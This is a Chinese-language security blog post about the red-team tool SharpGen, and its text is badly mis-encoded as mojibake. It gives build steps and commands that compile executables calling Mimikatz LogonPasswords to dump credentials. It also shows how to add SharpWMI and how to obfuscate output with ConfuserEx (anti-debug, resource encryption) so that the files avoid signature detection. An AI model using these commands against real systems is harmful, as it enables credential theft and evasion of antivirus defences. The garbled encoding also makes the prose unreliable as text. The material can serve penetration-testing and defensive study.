I"í=<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>SharpGenæ˜¯æˆ‘è®¤ä¸ºç‰¹åˆ«æ£’çš„ä¸€ä¸ªå·¥å…·ï¼Œå®ƒèƒ½å¤Ÿç”¨æ¥å¯¹å…¶ä»–.Netç¨‹åºé›†è¿›è¡Œæ•´åˆã€é‡ç»„å¹¶åŠ å¯†ï¼ŒäºŒæ¬¡ç¼–è¯‘åå¯ç”Ÿæˆä¸€ä¸ªå…¨æ–°çš„å·¥å…·</p>

<p>æœ¬æ–‡å°†è¦ç ”ç©¶SharpGençš„ç»†èŠ‚ï¼Œä»‹ç»è°ƒç”¨å…¶ä»–å¼€æºåº“çš„è¯¦ç»†æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯</p>

<p>å‚è€ƒé“¾æ¥ï¼š</p>

<p>https://github.com/cobbr/SharpGen</p>

<p>https://cobbr.io/SharpGen.html</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>.NET Coreå¼€å‘ç¯å¢ƒæ­å»º</li>
  <li>åŠŸèƒ½ä»‹ç»</li>
  <li>è°ƒç”¨å…¶ä»–å¼€æºåº“çš„æ–¹æ³•</li>
  <li>åˆ©ç”¨æ€è·¯</li>
</ul>

<h2 id="0x02-net-coreå¼€å‘ç¯å¢ƒæ­å»º">0x02 .NET Coreå¼€å‘ç¯å¢ƒæ­å»º</h2>
<hr />

<p>SharpGenä½¿ç”¨.NET Coreï¼Œä¼˜ç‚¹æ˜¯æ”¯æŒå¤šå¹³å°(Linuxï¼ŒMacOSå’ŒWindows)</p>

<p>ç¼–ç¨‹è¯­è¨€ä½¿ç”¨C#ï¼Œåˆ©ç”¨<a href="https://github.com/dotnet/roslyn">Rosyln</a>ç¼–è¯‘.NET Frameworkæ§åˆ¶å°åº”ç”¨ç¨‹åºæˆ–åº“</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>Rosylnæ˜¯ä¸€ä¸ª.NETç¼–è¯‘å™¨å¹³å°ï¼Œé€šè¿‡Scripting APIï¼Œèƒ½å¤Ÿå¯¹è„šæœ¬æ–‡ä»¶è¿›è¡ŒåŠ¨æ€ç¼–è¯‘</p>

<p>æµ‹è¯•ç³»ç»Ÿï¼šWin7x64</p>

<p>æˆ‘åœ¨æµ‹è¯•ç³»ç»Ÿé€‰æ‹©å®‰è£….NET Core 2.2.0ã€ASP.NET Core 2.2.0å’ŒSDK 2.2.101ï¼Œè¿™æ˜¯ä¸ºäº†å…¼å®¹å¦ä¸€ä¸ªå·¥å…·<a href="https://github.com/cobbr/Covenant">Covenant</a></p>

<p>å¯¹åº”ç‰ˆæœ¬çš„ä¸‹è½½é“¾æ¥å¦‚ä¸‹ï¼š</p>

<p>https://dotnet.microsoft.com/download/thank-you/dotnet-sdk-2.2.101-windows-x64-installer</p>

<p>https://dotnet.microsoft.com/download/thank-you/dotnet-runtime-2.2.0-windows-x64-installer</p>

<p>https://dotnet.microsoft.com/download/thank-you/dotnet-runtime-2.2.0-windows-x64-asp.net-core-runtime-installer</p>

<p>å®‰è£…Git for Windowsï¼Œä¸‹è½½é“¾æ¥å¦‚ä¸‹ï¼š</p>

<p>https://github.com/git-for-windows/git/releases/download/v2.23.0.windows.1/Git-2.23.0-64-bit.exe</p>

<p>ä¸‹è½½å®‰è£…å¹¶ç¼–è¯‘SharpGenï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/cobbr/SharpGen
cd SharpGen
dotnet build --configuration Release
</code></pre></div></div>

<h2 id="0x03-åŸºæœ¬åŠŸèƒ½ä»‹ç»">0x03 åŸºæœ¬åŠŸèƒ½ä»‹ç»</h2>
<hr />

<p>SharpGené»˜è®¤é›†æˆäº†<a href="https://github.com/cobbr/SharpSploit">SharpSploit</a>ï¼Œèƒ½å¤Ÿç›´æ¥è°ƒç”¨å…¶ä¸­çš„åŠŸèƒ½</p>

<p>å‚æ•°è¯´æ˜ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Options:
  -? | -h | --help                                     Show help information
  -f | --file &lt;OUTPUT_FILE&gt;                            The output file to write to.
  -d | --dotnet | --dotnet-framework &lt;DOTNET_VERSION&gt;  The Dotnet Framework version to target (net35 or net40).
  -o | --output-kind &lt;OUTPUT_KIND&gt;                     The OutputKind to use (console or dll).
  -p | --platform &lt;PLATFORM&gt;                           The Platform to use (AnyCpy, x86, or x64).
  -n | --no-optimization                               Don't use source code optimization.
  -a | --assembly-name &lt;ASSEMBLY_NAME&gt;                 The name of the assembly to be generated.
  -s | --source-file &lt;SOURCE_FILE&gt;                     The source code to compile.
  -c | --class-name &lt;CLASS_NAME&gt;                       The name of the class to be generated.
  --confuse &lt;CONFUSEREX_PROJECT_FILE&gt;                  The ConfuserEx ProjectFile configuration.
</code></pre></div></div>

<h3 id="1å¯¹å•è¡Œä»£ç è¿›è¡Œç¼–è¯‘">1.å¯¹å•è¡Œä»£ç è¿›è¡Œç¼–è¯‘</h3>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe "Console.WriteLine(Mimikatz.LogonPasswords());"
</code></pre></div></div>

<p>æ‰§è¡Œè¿‡ç¨‹æ˜¾ç¤ºè‡ªåŠ¨è¡¥é½çš„ç¼–è¯‘ä»£ç ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-10-17/2-1.png" alt="Alt text" /></p>

<p>å€¼å¾—æ³¨æ„çš„æ˜¯å…¶ä¸­çš„éšæœºç±»å<code class="language-plaintext highlighter-rouge">ohq8r7eQ1qK</code>ï¼Œæ¯æ¬¡ç”Ÿæˆæ–‡ä»¶æ—¶ä½¿ç”¨çš„ç±»åå‡ä¼šæ”¹å˜</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>å¦‚æœæƒ³æŒ‡å®šç±»åï¼Œå¯ä»¥åŠ å…¥<strong>-c</strong>å‚æ•°ï¼Œç¤ºä¾‹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -c abcde12345 -f example.exe "Console.WriteLine(Mimikatz.LogonPasswords());" 
</code></pre></div></div>

<p>å‘½ä»¤æ‰§è¡Œåç”Ÿæˆexample.exeï¼Œexample.exeä¼šè°ƒç”¨Mimikatzçš„<code class="language-plaintext highlighter-rouge">sekurlsa::logonpasswords</code>å‘½ä»¤</p>

<h3 id="2å¯¹å®Œæ•´ä»£ç æ–‡ä»¶è¿›è¡Œç¼–è¯‘">2.å¯¹å®Œæ•´ä»£ç æ–‡ä»¶è¿›è¡Œç¼–è¯‘</h3>

<p>example.txtçš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using SharpSploit.Execution;
using SharpSploit.Credentials;

class Program
{
    static void Main()
    {
        Console.WriteLine(Mimikatz.LogonPasswords());
        return;
    }
}
</code></pre></div></div>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
</code></pre></div></div>

<p>æ‰§è¡Œè¿‡ç¨‹æ˜¾ç¤ºç¼–è¯‘ä»£ç ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-10-17/2-2.png" alt="Alt text" /></p>

<p>ç”±äºæŒ‡å®šäº†ç±»åä¸º<code class="language-plaintext highlighter-rouge">Program</code>ï¼Œæ‰€ä»¥ä¸å†å…·æœ‰éšæœºç±»åçš„åŠŸèƒ½</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>SharpGenä½¿ç”¨äº†Rosylnè¿›è¡ŒåŠ¨æ€ç¼–è¯‘ï¼Œæ¯æ¬¡ç”Ÿæˆçš„æ–‡ä»¶hashéƒ½ä¼šä¸ä¸€æ ·</p>

<h2 id="0x04-é«˜çº§åŠŸèƒ½">0x04 é«˜çº§åŠŸèƒ½</h2>
<hr />

<h3 id="1ç¼©å°ç”Ÿæˆæ–‡ä»¶çš„ä½“ç§¯">1.ç¼©å°ç”Ÿæˆæ–‡ä»¶çš„ä½“ç§¯</h3>

<h4 id="1å–æ¶ˆå¯¹æŒ‡å®šdllçš„å¼•ç”¨">(1)å–æ¶ˆå¯¹æŒ‡å®šdllçš„å¼•ç”¨</h4>

<p>ç¼–è¾‘æ–‡ä»¶<code class="language-plaintext highlighter-rouge">SharpGen/References/references.yml</code></p>

<p>æ­¤å¤„çš„dllé€šå¸¸ä¸ºC#ç¨‹åºä½¿ç”¨çš„å¼•ç”¨æ–‡ä»¶</p>

<p>ä¸éœ€è¦çš„dllåç§°å±æ€§ç”±<code class="language-plaintext highlighter-rouge">Enabled: true</code>æ”¹ä¸º<code class="language-plaintext highlighter-rouge">Enabled: false</code></p>

<h4 id="2å–æ¶ˆå¯¹æŒ‡å®šdllçš„å¼•ç”¨">(2)å–æ¶ˆå¯¹æŒ‡å®šdllçš„å¼•ç”¨</h4>

<p>ç¼–è¾‘æ–‡ä»¶<code class="language-plaintext highlighter-rouge">SharpGen/Resources/resources.yml</code></p>

<p>æ­¤å¤„çš„dllä¸ºå®ç°mimikatzçš„åŠŸèƒ½</p>

<p>ä¸éœ€è¦çš„dllåç§°å±æ€§ç”±<code class="language-plaintext highlighter-rouge">Enabled: true</code>æ”¹ä¸º<code class="language-plaintext highlighter-rouge">Enabled: false</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<ul>
  <li>powerkatz_x64.dllä¸º64ä½çš„mimikatz</li>
  <li>powerkatz_x64.dll.compä¸ºä½¿ç”¨System.IO.Compressionåº“å‹ç¼©åçš„64ä½çš„mimikatz</li>
  <li>powerkatz_x86.dllä¸º32ä½çš„mimikatz</li>
  <li>powerkatz_x86.dll.compä¸ºä½¿ç”¨System.IO.Compressionåº“å‹ç¼©åçš„32ä½çš„mimikatz</li>
</ul>

<h4 id="3ä½¿ç”¨confuserexèµ„æºä¿æŠ¤">(3)ä½¿ç”¨ConfuserExèµ„æºä¿æŠ¤</h4>

<p>ConfuserExèµ„æºä¿æŠ¤ä¼šå¯¹èµ„æºè¿›è¡ŒåŠ å¯†å’ŒLZMAå‹ç¼©</p>

<p>ç¤ºä¾‹å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --confuse confuse.cr "Console.WriteLine(Mimikatz.LogonPasswords());"
</code></pre></div></div>

<h3 id="2è°ƒç”¨å…¶ä»–å¼€æºåº“">2.è°ƒç”¨å…¶ä»–å¼€æºåº“</h3>

<p>å‚è€ƒèµ„æ–™ä¸­æœªä»‹ç»è¿™éƒ¨åˆ†å†…å®¹ï¼Œè¿™é‡Œç»™å‡ºæˆ‘çš„è§£å†³æ–¹æ³•</p>

<p>è¿™é‡Œç»™å‡ºä¸¤ä¸ªç¤ºä¾‹ï¼Œä¸€ä¸ªæ˜¯å¼€æºçš„<a href="https://github.com/GhostPack/SharpWMI">SharpWMI</a>ï¼Œå¦ä¸€ä¸ªæ˜¯æˆ‘è‡ªå·±ç¼–å†™çš„æ¨¡æ¿SharpTest</p>

<h4 id="1æ·»åŠ å¯¹sharpwmiçš„è°ƒç”¨">1.æ·»åŠ å¯¹SharpWMIçš„è°ƒç”¨</h4>

<p>(1)å°†SharpWMIæºç å¤åˆ¶åˆ°<code class="language-plaintext highlighter-rouge">SharpGen/Source</code></p>

<p>(2)ä¿®æ”¹<code class="language-plaintext highlighter-rouge">SharpGen/SharpGen.csproj</code></p>

<p>ItemGroupæ ‡ç­¾ä¸­æ·»åŠ <code class="language-plaintext highlighter-rouge">&lt;Compile Remove="Source\SharpWMI\Program.cs" /&gt;</code></p>

<p>å¦åˆ™åœ¨ç¼–è¯‘SharpGenæ—¶ä¼šæŠ¥é”™æç¤ºï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Source\SharpWMI\Program.cs(3,14): error CS0234: The type or namespace name 'Management' does not exist in the namespace 'System' (are you missing an assembly reference?)
</code></pre></div></div>

<p>(3)ä¿®æ”¹SharpWMIçš„æºä»£ç </p>

<p>åªä¿ç•™Program.csï¼Œåˆ é™¤å…¶ä¸­çš„Mainå‡½æ•°å¹¶ä¸”å°†Program.csä¸­çš„æ¯ä¸ªé™æ€æ–¹æ³•æ”¹ä¸ºå…¬å…±æ–¹æ³•</p>

<p>ä¾‹å¦‚ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = "")</code>éœ€è¦ä¿®æ”¹ä¸º<code class="language-plaintext highlighter-rouge">public static void LocalWMIQuery(string wmiQuery, string wmiNameSpace = "")</code></p>

<p>(4)é‡æ–°ç¼–è¯‘SharpGen</p>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet build --configuration Release
</code></pre></div></div>

<p>(5)è°ƒç”¨æµ‹è¯•</p>

<p>example.txtçš„åŠŸèƒ½ä¸ºè°ƒç”¨SharpWMIä¸­çš„<code class="language-plaintext highlighter-rouge">LocalWMIQuery</code>æ–¹æ³•æŸ¥è¯¢<code class="language-plaintext highlighter-rouge">win32_ComputerSystem</code>ï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SharpWMI.Program.LocalWMIQuery("select * from win32_ComputerSystem");
Console.WriteLine(Host.GetProcessList());
</code></pre></div></div>

<p>SharpGençš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
</code></pre></div></div>

<p>ç”Ÿæˆexample.exå¹¶æ‰§è¡Œï¼Œè°ƒç”¨æˆåŠŸï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-10-17/2-3.png" alt="Alt text" /></p>

<h4 id="2æ·»åŠ è‡ªå·±ç¼–å†™çš„cæ¨¡æ¿">2.æ·»åŠ è‡ªå·±ç¼–å†™çš„C#æ¨¡æ¿</h4>

<p>å‘½åä¸ºSharpTestï¼ŒåŠŸèƒ½ä¸ºæ¥æ”¶å‚æ•°å¹¶åœ¨å‘½ä»¤è¡Œè¾“å‡º</p>

<p>(1)æ–°å»ºæ–‡ä»¶å¤¹SharpTestï¼Œå…¶ä¸­æ–°å»ºæ–‡ä»¶Program.csï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Collections.Generic;
using System.Management;
namespace SharpTest
{
    class Program
    {
        public static void TestMethod(string string1)
        {
            Console.WriteLine(string1);
        }
    }
}
</code></pre></div></div>

<p>(2)ä¿®æ”¹SharpGen/SharpGen.csproj</p>

<p>ItemGroupæ ‡ç­¾ä¸­æ·»åŠ <code class="language-plaintext highlighter-rouge">&lt;Compile Remove="Source\SharpTest\Program.cs" /&gt;</code></p>

<p>(3)é‡æ–°ç¼–è¯‘SharpGen</p>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet build --configuration Release
</code></pre></div></div>

<p>(4)è°ƒç”¨æµ‹è¯•</p>

<p>example.txtçš„åŠŸèƒ½ä¸ºè°ƒç”¨SharpTestä¸­çš„TestMethodæ–¹æ³•ï¼Œå‚æ•°ä¸º<code class="language-plaintext highlighter-rouge">123456</code>ï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SharpTest.Program.TestMethod("123456");
</code></pre></div></div>

<p>SharpGençš„å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
</code></pre></div></div>

<p>ç”Ÿæˆexample.exeå¹¶æ‰§è¡Œï¼Œè°ƒç”¨æˆåŠŸï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2019-10-17/2-4.png" alt="Alt text" /></p>

<p>ä¸ºäº†ä¾¿äºæµ‹è¯•ï¼Œæˆ‘å·²ç»forkäº†cobbrçš„SharpGenï¼Œæ·»åŠ äº†å¯¹SharpWMIå’ŒSharpTestçš„è°ƒç”¨ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/SharpGen</p>

<h3 id="3èµ„æºä¿æŠ¤">3.èµ„æºä¿æŠ¤</h3>

<p>ä½¿ç”¨æ–°ç‰ˆçš„ConfuserExèƒ½å¤Ÿå¯¹ç¼–è¯‘åçš„æ–‡ä»¶èµ„æºè¿›è¡Œä¿æŠ¤ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/mkaring/ConfuserEx</p>

<p>æ—§ç‰ˆçš„ConfuserExä¸å†è¿›è¡Œç»´æŠ¤ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/yck1509/ConfuserEx</p>

<p>è°ƒç”¨å‘½ä»¤ç¤ºä¾‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --confuse confuse.cr "Console.WriteLine(Mimikatz.LogonPasswords());"
</code></pre></div></div>

<p>å¯¹åº”ä½¿ç”¨çš„é…ç½®æ–‡ä»¶ä¸º<code class="language-plaintext highlighter-rouge">SharpGen/confuse.cr</code></p>

<p>é»˜è®¤é…ç½®ä¸ºå¯¹èµ„æºæ‰§è¡ŒåŠ å¯†å’ŒLZMAå‹ç¼©</p>

<p>ConfuserExè¿˜æ”¯æŒå…¶ä»–ä¿æŠ¤åŠŸèƒ½ï¼š</p>

<ul>
  <li>Anti Debug Protection</li>
  <li>Anti Dump Protection</li>
  <li>Anti IL Dasm Protection</li>
  <li>Anti Tamper Protection</li>
  <li>Constants Protection</li>
  <li>Control Flow Protection</li>
  <li>Invalid Metadata Protection</li>
  <li>Name Protection</li>
  <li>Reference Proxy Protection</li>
  <li>Resources Protection</li>
</ul>

<p>åªéœ€è¦å»æ‰<code class="language-plaintext highlighter-rouge">SharpGen/confuse.cr</code>ä¸­å¯¹åº”çš„æ³¨é‡Šå³å¯</p>

<p>ä¾‹å¦‚æ·»åŠ <code class="language-plaintext highlighter-rouge">anti debug</code>åŠŸèƒ½ï¼Œé…ç½®æ–‡ä»¶confuse.crçš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;project baseDir="{0}" outputDir="{1}" xmlns="http://confuser.codeplex.com"&gt;
    &lt;module path="{2}"&gt;
      &lt;rule pattern="true" inherit="false"&gt;
         &lt;!-- &lt;protection id="anti debug" /&gt;       --&gt;
         &lt;!-- &lt;protection id="anti dump" /&gt;        --&gt;
         &lt;!-- &lt;protection id="anti ildasm" /&gt;      --&gt;
         &lt;!-- &lt;protection id="anti tamper" /&gt;      --&gt;
         &lt;!-- &lt;protection id="constants" /&gt;        --&gt;
         &lt;!-- &lt;protection id="ctrl flow" /&gt;        --&gt;
         &lt;!-- &lt;protection id="invalid metadata" /&gt; --&gt;
         &lt;!-- &lt;protection id="ref proxy" /&gt;        --&gt;
         &lt;!-- &lt;protection id="rename" /&gt;           --&gt;
         &lt;protection id="resources" /&gt;
         &lt;protection id="anti debug" /&gt;
      &lt;/rule&gt;
    &lt;/module&gt;
&lt;/project&gt;
</code></pre></div></div>

<h3 id="4è¡¥å……ç¦ç”¨ä¼˜åŒ–">4.è¡¥å……ï¼šç¦ç”¨ä¼˜åŒ–</h3>

<p>SharpGenåœ¨ç¼–è¯‘æœŸé—´ä¼šå¯¹æºä»£ç è¿›è¡Œä¼˜åŒ–ï¼Œå¯é€šè¿‡<code class="language-plaintext highlighter-rouge">--no-optimization</code>å‚æ•°æ¥ç¦ç”¨ä¼˜åŒ–ï¼Œè¿™å°†å¯¼è‡´å¢åŠ ç”Ÿæˆæ–‡ä»¶çš„å¤§å°</p>

<h2 id="0x05-åˆ©ç”¨åˆ†æ">0x05 åˆ©ç”¨åˆ†æ</h2>
<hr />

<p>SharpGenå¯ä»¥ä½œä¸º.Netç¨‹åºé›†é‡æ–°åŒ…è£…çš„å¹³å°ï¼Œå…·æœ‰å¦‚ä¸‹ä¼˜ç‚¹ï¼š</p>

<ul>
  <li>ä½¿ç”¨.NET Coreå¹³å°å’ŒRoslynè¿›è¡ŒåŠ¨æ€ç¼–è¯‘ï¼Œå¼€å‘ä»£ç æ—¶å¯é€‰æ‹©å¤šå¹³å°(Linuxï¼ŒMacOSå’ŒWindows)</li>
  <li>å¯è°ƒç”¨å…¶ä»–å¼€æºåº“ï¼Œå®ç°åŠŸèƒ½çš„å®šåˆ¶ï¼Œæœ€åå°†å…¶å°è£…æˆå•ç‹¬çš„ä¸€ä¸ªexeæ–‡ä»¶æˆ–dllæ–‡ä»¶</li>
  <li>ä½¿ç”¨ConfuserExå¯¹èµ„æºè¿›è¡ŒåŠ å¯†å’Œå‹ç¼©ï¼Œé¿å…å¯¹ç‰¹å¾ç çš„æ£€æµ‹</li>
  <li>ç”Ÿæˆçš„æ–‡ä»¶æ”¯æŒ.Net3.5å’Œ.Net 4.0</li>
  <li>ç”Ÿæˆçš„æ–‡ä»¶æ”¯æŒx86å’Œx64</li>
</ul>

<p>æ›´è¿›ä¸€æ­¥ï¼Œä½¿ç”¨SharpGenèƒ½å¤Ÿå¿«é€Ÿçš„å°†.Netç¨‹åºé›†å½¢å¼çš„POCè½¬æ¢æˆEXP</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡ä»‹ç»äº†SharpGençš„åŠŸèƒ½ï¼Œåˆ†äº«äº†æˆ‘å®ç°è°ƒç”¨å…¶ä»–å¼€æºåº“çš„æ–¹æ³•ï¼Œåˆ†æSharpGençš„ä¼˜ç‚¹ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET